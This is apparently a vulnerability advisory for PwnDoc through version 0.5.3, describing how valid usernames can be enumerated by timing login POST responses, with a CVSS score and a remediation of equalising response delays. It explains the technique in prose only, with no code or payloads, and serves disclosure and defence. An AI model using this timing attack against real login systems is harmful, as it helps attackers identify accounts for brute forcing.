PwnDoc <= 0.5.3 - Username Enumeration via response timings

CVE Detail

PwnDoc through 0.5.3 might allow remote attackers to identify valid user account names by leveraging response timings for authentication attempts.

ProductCVEOwnerCVSSv3 ScoreCWE

5.3 Medium

Exploitation Steps

It is possible to enumerate users registered in PwnDoc (tested on 0.5.3 - 2022-07-19 and previous versions) observing the web server response timing. For example, let's suppose these users were registered on PwnDoc:

By performing a brute force dictionary attack, a defined list of users can be provided via login POST request to detect the server's response time.

All the valid users can be discovered by a potential attacker checking if the response time to the login request is long. For not-existing users we can see a shorter response time.

The attack success depends higly on the stability of the server and the Internet connection between hosts. In any case, in order to apply a remediation, it is advisable to add a timing delay to balance the response timing for each login request.

Last updated